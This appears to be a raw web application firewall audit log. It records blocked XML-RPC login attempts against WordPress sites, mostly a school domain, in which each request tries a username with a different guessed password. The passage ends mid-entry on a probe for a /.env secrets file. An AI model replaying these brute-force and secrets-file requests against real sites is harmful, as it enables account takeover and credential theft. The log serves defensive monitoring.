WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119808880302 2731 (- - -) Stopwatch2: 1749119808880302 2731; combined=2011, p1=222, p2=1685, p3=0, p4=0, p5=61, sr=49, sw=43, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7f53a69-Z-- --ac8c3a0a-A-- [05/Jun/2025:17:37:50 +0700] aEFzfirHpfaS2Cuwh8UGtAAAAE0 103.236.140.4 50712 103.236.140.4 8181 --ac8c3a0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ac8c3a0a-C-- wp.getUsersBlogs kajur maria --ac8c3a0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac8c3a0a-E-- --ac8c3a0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119870057948 4171 (- - -) Stopwatch2: 1749119870057948 4171; combined=3215, p1=381, p2=2668, p3=0, p4=0, p5=97, sr=98, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac8c3a0a-Z-- --a0c21c6c-A-- [05/Jun/2025:17:38:50 +0700] aEFzuirHpfaS2Cuwh8UG1gAAAFg 103.236.140.4 50878 103.236.140.4 8181 --a0c21c6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a0c21c6c-C-- wp.getUsersBlogs kajur iloveu --a0c21c6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0c21c6c-E-- --a0c21c6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119930614572 4662 (- - -) Stopwatch2: 1749119930614572 4662; combined=3353, p1=393, p2=2799, p3=0, p4=0, p5=94, sr=82, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0c21c6c-Z-- --8f0cbe05-A-- [05/Jun/2025:17:39:59 +0700] aEFz_3-K7ToMdu-YSIJTPAAAABU 103.236.140.4 51062 103.236.140.4 8181 --8f0cbe05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8f0cbe05-C-- wp.getUsersBlogs kajur jessica1 --8f0cbe05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f0cbe05-E-- --8f0cbe05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119999325796 5737 (- - -) Stopwatch2: 1749119999325796 5737; combined=3905, p1=494, p2=3208, p3=0, p4=0, p5=117, sr=100, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f0cbe05-Z-- --64abf304-A-- [05/Jun/2025:17:40:19 +0700] aEF0E3-K7ToMdu-YSIJTQwAAAAc 103.236.140.4 51106 103.236.140.4 8181 --64abf304-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --64abf304-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin@123websitedev --64abf304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64abf304-E-- --64abf304-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749120019309160 4680 (- - -) Stopwatch2: 1749120019309160 4680; combined=3649, p1=402, p2=3071, p3=0, p4=0, p5=102, sr=80, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64abf304-Z-- --0d45825c-A-- [05/Jun/2025:17:41:05 +0700] aEF0Qeth7G2xELALzPZaYgAAAMA 103.236.140.4 51222 103.236.140.4 8181 --0d45825c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --0d45825c-C-- wp.getUsersBlogs kajur england --0d45825c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d45825c-E-- --0d45825c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120065364373 6007 (- - -) Stopwatch2: 1749120065364373 6007; combined=4130, p1=528, p2=3438, p3=0, p4=0, p5=96, sr=89, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d45825c-Z-- --79a8d636-A-- [05/Jun/2025:17:42:05 +0700] aEF0feth7G2xELALzPZaeAAAAMw 103.236.140.4 51368 103.236.140.4 8181 --79a8d636-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --79a8d636-C-- wp.getUsersBlogs kajur 212121 --79a8d636-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79a8d636-E-- --79a8d636-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120125427802 4152 (- - -) Stopwatch2: 1749120125427802 4152; combined=3191, p1=340, p2=2685, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79a8d636-Z-- --5f8cf51b-A-- [05/Jun/2025:17:43:06 +0700] aEF0uirHpfaS2Cuwh8UHKQAAAE0 103.236.140.4 51514 103.236.140.4 8181 --5f8cf51b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5f8cf51b-C-- wp.getUsersBlogs kesiswaan kesiswaanpassword --5f8cf51b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f8cf51b-E-- --5f8cf51b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120186305261 4362 (- - -) Stopwatch2: 1749120186305261 4362; combined=3293, p1=353, p2=2774, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f8cf51b-Z-- --96f56a28-A-- [05/Jun/2025:17:44:07 +0700] aEF09-th7G2xELALzPZahQAAANM 103.236.140.4 51730 103.236.140.4 8181 --96f56a28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 235 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --96f56a28-C-- wp.getUsersBlogs kesiswaan smkn22-jkt.sch123456 --96f56a28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96f56a28-E-- --96f56a28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120247197829 4677 (- - -) Stopwatch2: 1749120247197829 4677; combined=3335, p1=435, p2=2704, p3=0, p4=0, p5=115, sr=90, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96f56a28-Z-- --5d94f122-A-- [05/Jun/2025:17:45:07 +0700] aEF1M-th7G2xELALzPZaqAAAAMw 103.236.140.4 51888 103.236.140.4 8181 --5d94f122-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5d94f122-C-- wp.getUsersBlogs kesiswaan kesiswaanPWD --5d94f122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d94f122-E-- --5d94f122-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120307782706 5432 (- - -) Stopwatch2: 1749120307782706 5432; combined=3809, p1=483, p2=3157, p3=0, p4=0, p5=100, sr=100, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d94f122-Z-- --64525012-A-- [05/Jun/2025:17:46:13 +0700] aEF1dSrHpfaS2Cuwh8UHvQAAAFE 103.236.140.4 52082 103.236.140.4 8181 --64525012-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --64525012-C-- wp.getUsersBlogs kesiswaan Admin!@# --64525012-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64525012-E-- --64525012-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120373080965 5400 (- - -) Stopwatch2: 1749120373080965 5400; combined=3834, p1=482, p2=3173, p3=0, p4=0, p5=105, sr=114, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64525012-Z-- --a114a469-A-- [05/Jun/2025:17:47:13 +0700] aEF1sVwdJdhOudw5hdz8QAAAAJc 103.236.140.4 52236 103.236.140.4 8181 --a114a469-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a114a469-C-- wp.getUsersBlogs kesiswaan asd123!@# --a114a469-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a114a469-E-- --a114a469-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120433218053 5075 (- - -) Stopwatch2: 1749120433218053 5075; combined=3682, p1=452, p2=3062, p3=0, p4=0, p5=99, sr=93, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a114a469-Z-- --9d38573e-A-- [05/Jun/2025:17:48:15 +0700] aEF171wdJdhOudw5hdz8TAAAAIg 103.236.140.4 52398 103.236.140.4 8181 --9d38573e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --9d38573e-C-- wp.getUsersBlogs kesiswaan explorer --9d38573e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d38573e-E-- --9d38573e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120495515461 4454 (- - -) Stopwatch2: 1749120495515461 4454; combined=3394, p1=358, p2=2869, p3=0, p4=0, p5=98, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d38573e-Z-- --78c51874-A-- [05/Jun/2025:17:49:18 +0700] aEF2Ln-K7ToMdu-YSIJTqwAAAAE 103.236.140.4 52590 103.236.140.4 8181 --78c51874-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --78c51874-C-- wp.getUsersBlogs kesiswaan admin@321 --78c51874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78c51874-E-- --78c51874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120558144783 31652 (- - -) Stopwatch2: 1749120558144783 31652; combined=57850, p1=362, p2=2781, p3=0, p4=0, p5=27367, sr=81, sw=69, l=0, gc=27271 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78c51874-Z-- --6eed7d2a-A-- [05/Jun/2025:17:49:51 +0700] aEF2TyrHpfaS2Cuwh8UINQAAAFg 103.236.140.4 52694 103.236.140.4 8181 --6eed7d2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6eed7d2a-C-- wp.getUsersBlogs kesiswaan 1234%^&* --6eed7d2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6eed7d2a-E-- --6eed7d2a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120591743089 5195 (- - -) Stopwatch2: 1749120591743089 5195; combined=3776, p1=460, p2=3143, p3=0, p4=0, p5=103, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6eed7d2a-Z-- --8728204f-A-- [05/Jun/2025:17:50:18 +0700] aEF2alwdJdhOudw5hdz8ggAAAIQ 103.236.140.4 52788 103.236.140.4 8181 --8728204f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 234 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8728204f-C-- wp.getUsersBlogs kesiswaan administrator!@#$%^ --8728204f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8728204f-E-- --8728204f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120618046992 5290 (- - -) Stopwatch2: 1749120618046992 5290; combined=3802, p1=474, p2=3157, p3=0, p4=0, p5=100, sr=125, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8728204f-Z-- --689c3123-A-- [05/Jun/2025:17:50:33 +0700] aEF2eX-K7ToMdu-YSIJTwgAAABY 103.236.140.4 52842 103.236.140.4 8181 --689c3123-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: 